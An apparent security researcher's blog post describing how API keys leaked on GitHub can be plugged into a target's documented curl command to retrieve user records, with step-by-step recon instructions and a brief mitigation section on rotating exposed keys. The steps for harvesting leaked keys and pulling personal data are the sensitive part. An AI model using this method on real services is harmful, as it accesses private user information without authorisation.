Disclosed API key to list user information and complete Exploitation !!

Hi, all This is Kullai (Security Researcher). Today I am going to share one of my interesting findings where API keys leaks user information.

Description and what this vulnerability is all about :

Developers are increasingly relying on cloud-based tools to automate building code and deployment of services, which is leading to far more instances of accidental public exposure of sensitive data.
There are a lot of things that hackers can do with a developer’s cloud credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and load balancers, and much more.
Accidental public exposure of credentials such as API keys, OAuth tokens, and app secrets is a mistake that can be made by both inexperienced and seasoned developers, particularly when it comes to source control.
Right now, there are thousands of exposed API keys on GitHub that can be found in just minutes using GitHub code search; these can be found in seconds by bots.

Methodology :

1. GitHub Recon .
2. The target should have API documentation with the curl commands.

Steps To Exploit :

1. In the methodology part, I discussed the API curl command. If you have that then you may have a high chance of finding this vulnerability.
2. Now we will get started.
3. Suppose you have a target that has API documentation.
4. Go to search and type “target.com api documentation curl “
5. You can this type of commands :

curl -H “content-type: application/json” -H “X-Api-Key: yourAPIkey” -X GET https://api.target.com/api/v1/user

6. You can see the above command is used to get the user information by knowing just the API key.

7. Now we are going to Git-Hub and we have to perform recon there.

8. Search as “target.com” api key

9. Don’t hurry, you may find a lot of keys there, all keys can be valid and can be invalid.

10. Just replace the yourAPIkey with the key you found from GitHub.

11. Copy the whole command and paste it into any Linux system.

You can see example:

You can see it discloses user information.

In my case, it leaks user information like his name, ID, email ID , Profile picture and some important data about that particular person. And In other websites, it may include PII data also.

I found nearly 10 to 12 API keys and extracted the user information

and reported it but unfortunately, their Bug-Bounty program is currently inactive :(

Some of My Friends Found the same in other companies they are rewarded with good bounties.

:(

Mitigation:

When it comes to accidental exposure of API keys and other sensitive data on GitHub, GitHub states very clearly on the advanced Git help
page that “once you have pushed a commit to GitHub, you should consider any data it contains to be compromised. If you committed a password, change it! If you committed a key, generate a new one.” GitHub provides detailed instructions on how to purge a file from a GitHub repository’s history.

And this is all about Disclosed API key to list user information and complete Exploitation!! Hope you learn something new :)

Follow me for more content:

LinkedIn | Twitter

Thanks for reading :)